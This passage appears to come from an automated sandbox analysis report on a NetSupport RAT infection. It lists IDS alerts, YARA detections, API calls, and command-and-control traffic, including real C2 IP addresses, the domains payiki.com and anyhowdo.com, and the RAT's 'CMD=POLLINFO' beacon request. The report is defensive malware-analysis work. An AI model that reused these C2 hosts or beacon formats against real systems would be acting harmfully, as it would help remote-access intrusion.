                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,8_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,8_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,8_2_11064E30

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49740 -> 199.188.200.195:443
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49739 -> 151.236.16.15:443
                                  Yara detected NetSupport Downloader
                                  Source: Yara matchFile source: amsi32_5448.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, type: DROPPED
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: Joe Sandbox ViewIP Address: 151.236.16.15 151.236.16.15
                                  Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                  Source: Joe Sandbox ViewIP Address: 199.188.200.195 199.188.200.195
                                  Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
                                  Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49744
                                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49733
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficDNS traffic detected: DNS query: payiki.com
                                  Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                  Source: global trafficDNS traffic detected: DNS query: anyhowdo.com
                                  Source: unknownHTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:25 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795488750c13-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:25 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795488750c13-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:25 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795488750c13-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:25 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795488750c13-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:27 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df7795fce8b1440-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQjO%2B41IdUtx%2FJmGyD87oAf6VQPsI1Chxse26dpberDEWTV%2FWp0MpdaxbscXKb1WGKQpzdrNsKelEeTwlExkgdzda5JgF2CrvwH0AN%2F7eje7NBY2aeMPN5e%2Fhgew8yebCx%2FRiGxCS1wYq1N7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1054&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:02:28 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df77965ffcc4751-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4knnFWNE1BF9p27ArHB4yz%2FHT3QSRWU4CBsaxuAejnAP2XeAYI%2BhoGOLcuuG7PI4Ie1IpAtLJrap97WMEhm15TBDCAll7SAFt4XMFb8f63oKwgkRK67MnnOtET1aGOwhuEDZWAE0ZOUthX6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1201&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                  Source: client32.exe, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htm
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                  Source: client32.exe, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1
                                  Source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                  Source: client32.exe, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp%f
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp3f
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspEg
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspFz
                                  Source: client32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspNx
                                  Source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                  Source: client32.exe, 00000007.00000002.4095147957.000000000082A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspu
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://qt-project.org/xml/features/report-start-end-entity
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://qt-project.org/xml/features/report-whitespace-only-CharData
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://s.symcd.com06
